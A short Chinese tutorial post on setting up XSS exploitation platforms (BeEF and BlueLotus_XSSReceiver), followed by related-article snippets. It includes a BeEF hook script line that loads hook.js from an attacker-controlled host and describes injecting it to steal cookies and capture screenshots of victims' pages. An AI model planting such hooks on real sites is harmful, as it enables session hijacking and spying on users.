xss漏洞之——XSS平台搭建
前言
经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个:
1.kali下的beef
(1)kali命令行里输入beef-xss,得到一个脚本
<script src="http://127.0.0.1:3000/hook.js"></script>
将127.0.0.1改为kali的ip,之后进行植入
(2)kali命令行里输入beef-xss,得到beef管理网址http://127.0.0.1:3000/ui/panel,访问就可以对刚刚植入代码的机器进行攻击
例如获取cookie:
2.BlueLotus_XSSReceiver搭建的XSS平台
(1)在github搜索BlueLotus_XSSReceiver,下载环境BlueLotus_XSSReceiver-master,放到www目录下,之后安装
(2)安装好之后新建一个js,直接引用模板,此处引用将当前页面生成一张截图的模板screenshot,输入网站路径,点击生成payload
(3)植入代码:
(4)接收面板里可看到数据回显,返回的内容即为base64编码后的截图
xss漏洞之——XSS平台搭建相关推荐
- 利用xss漏洞结合xss平台实现社工钓鱼
本文主要介绍如何结合 xss平台 利用xss漏洞 然后,伪造一个钓鱼登陆页,然后,实现钓鱼,获取 用户和密码,之后传到我们的公网服务器中 首先我们需要一个存在xss漏洞的网站,不管是反射或存储,只要它 ...
- 安鸾靶场之XSS漏洞_交友平台
本次实验的环境由安鸾渗透实战平台搭建 目标是渗透进网站拿到flag 提示flag在服务器根目录 出于学习目的,由于本人也是小白,错误的地方望指点 参考链接:MD5截断比较验证 - Ye'sBlog - ...
- url存在宽字节跨站漏洞_【XSS漏洞】XSS漏洞相关总结v1.0
点击上方"公众号" 可以订阅哦! Hello,各位小伙伴周五晚上好~ 终于到了XSS漏洞的完结篇啦~~ 感觉本公众号写的最多的就是XSS,现在可以告一段落了... 让我们来看看第一 ...
- XSS漏洞,通过XSS实现网页挂马
**今天讲下通过XSS实现网页挂马~*,目的是了解安全方面知识,提升生活网络中辨别度 原理: 实验分为两部分: 1.通过Kali linux,利用MS14_064漏洞,制作一个木马服务器.存在该漏洞的 ...
- web漏洞-xss漏洞
web漏洞-xss漏洞 文章目录 web漏洞-xss漏洞 前言 xss介绍 什么是xss xss漏洞产生原因 xss漏洞危害 xss漏洞分类 反射型xss 存储型xss DOM型xss xss漏洞防护 ...
- 【XSS漏洞-01】XSS漏洞简介、危害与分类及验证
目录 1 XSS漏洞简介 2 XSS漏洞危害 3 XSS漏洞分类 3.1 反射型XSS 3.2 存储型XSS 3.3 DOM型XSS 3.3.1 节点树模型 3.3.2 DOM型XSS 4 漏洞验证 ...
- ctfshow XSS漏洞web316-328
XSS漏洞 漏洞简介: XSS(Cross Site Scripting)意为跨站脚本攻击.为了不与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写 ...
- 浏览器安全与XSS漏洞
文章目录 浏览器安全测试 1.同源策略 1.1意义 1.2目的 1.3注意 2.浏览器沙箱 2.2设计目的 2.3多进程架构 2.4好处 三.恶意网站拦截 1.别的威胁 跨站脚本(XSS)漏洞 1.介 ...
- XSS漏洞原理及攻击
XSS漏洞原理 XSS介绍 XSS漏洞介绍 1. 跨站脚本(Cross-Site Scripting),简称为XSS或CSS或跨站脚本攻击,是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种. ...
最新文章
- android的 selector 背景选择器和 shape 详解(转)
- LeetCode SQL 196. 删除重复的电子邮箱
- 什么是 SAP Business Function
- python txt转dataframe_Python格式化解析不规则txt文本并转为dataframe
- 蓝桥杯 ADV-169 算法提高 士兵排队问题
- 运行 ROS-Academy-for-Beginners
- opengl魔方文档_基于OpenGL的3D旋转魔方的实现.doc
- hdu 5025 Saving Tang Monk 状态压缩dp+广搜
- 移动硬盘读取速度一般是多少
- 热点drcom 破解
- 德州学院计算机专业怎样,2017德州学院各专业录取分数线
- 《C++语言基础》网络课程主页
- 前端基础 CSS 第十一章 使用CSS样式表 ----暑假学习第七、八天
- BAT企业招聘的职位里,60%以上都在招大数据人才!
- 云队友丨他是前斯坦福大学校长,谷歌母公司Alphabet现任董事长,他说谦逊是有效领导力的基础
- 思考乐教育的荣耀与忧虑:整体增速放缓,异地扩张未见成效
- Mac下的破解软件真的安全吗?
- sql server 64位导入数据源中没有excel_【超级软件】PDFXEdit7Portable x32/64位
- 转 胡适《独立评论》,给自己的激励
- 设计心理学之席克定律和面部辨识
热门文章
- 不能卸载java_java不能完全卸载了,怎么处理???跪求高手指教11
- wampserver3.2.6切换中文报错处理方法以及中文版升级补丁
- MyCat (一) Mycat的安装
- 2022新超级蜘蛛池站群优化网站系统源码
- python算法一:枚举法
- 枚举法——python
- 剑指offer-跳楼梯和变态跳楼梯(C++)
- Plugin xxx was was not found in any of the following sources:
- 简述你计划使用的应用开发框架,及该框架的特点
- 国内首个ChatGPT镜像系统?辅助写代码真方便